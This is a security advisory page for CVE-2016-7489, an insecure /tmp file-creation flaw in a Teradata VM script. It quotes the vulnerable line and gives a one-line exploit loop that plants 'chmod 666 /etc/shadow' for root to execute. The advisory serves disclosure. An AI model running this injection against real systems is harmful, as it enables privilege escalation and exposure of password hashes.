Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLarry W. CashdollarPACKETSTORM:139796
HistoryNov 18, 2016 - 12:00 a.m.

Teradata Virtual Machine Community Edition 15.0 Insecure File Creation

2016-11-1800:00:00
Larry W. Cashdollar
packetstormsecurity.com
36

EPSS

0.018

Percentile

88.2%

JSON
`Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp  
Author: Larry W. Cashdollar, @_larry0  
Date: 2016-10-01  
Download Site: http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware  
Vendor: Teradata  
Vendor Notified: 2016-10-01  
Vendor Contact: web form contact  
Description: Teradata is a relational database, they provide a Virtual Machine image for developers and community use.  
Vulnerability:  
Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp may lead to elevated code execution.  
In /opt/teradata/gsctools/bin/t2a.pl  
  
320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr >/dev/null 2>&1` ;  
  
If a regular user controls /tmp/t2a.pl.get_profile.scr before the person executing this script creates it they can inject  
commands to be executed as that user.  
  
for example:  
  
$ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done  
  
If root or any other account runs that .pl script I see these files being created in /tmp  
  
[C] -rw-r----- 1 root root 14 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd  
[U] -rw-r----- 1 root root 14 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd  
[C] -rw-r----- 1 root root 0 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager  
[C] -rw-r----- 1 root root 0 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr  
[U] -rw-r----- 1 root root 44 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr  
[U] -rw-r----- 1 root root 152 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr  
[C] -rw-r----- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr  
[U] -rw-r----- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr  
[M] -rwxr-x--- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr   
  
CVE-ID: CVE-2016-7489  
Exploit Code:  
aC/ $ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done  
Advisory: www.vapidlabs.com/advisory.php?v=173  
  
  
`

Related

cve 1
zdt 1
cvelist 1
nvd 1
prion 1
cve
cve
CVE-2016-7489
2016-11-10 16:59:03
zdt
zdt
Teradata Virtual Machine Community Edition 15.0 Insecure File Creation Vulnerability
2016-11-19 00:00:00
cvelist
cvelist
CVE-2016-7489
2016-11-10 16:00:00
nvd
nvd
CVE-2016-7489
2016-11-10 16:59:03
prion
prion
Code injection
2016-11-10 16:59:00

EPSS

0.018

Percentile

88.2%

JSON
Related for PACKETSTORM:139796
cve1zdt1cvelist1nvd1prion1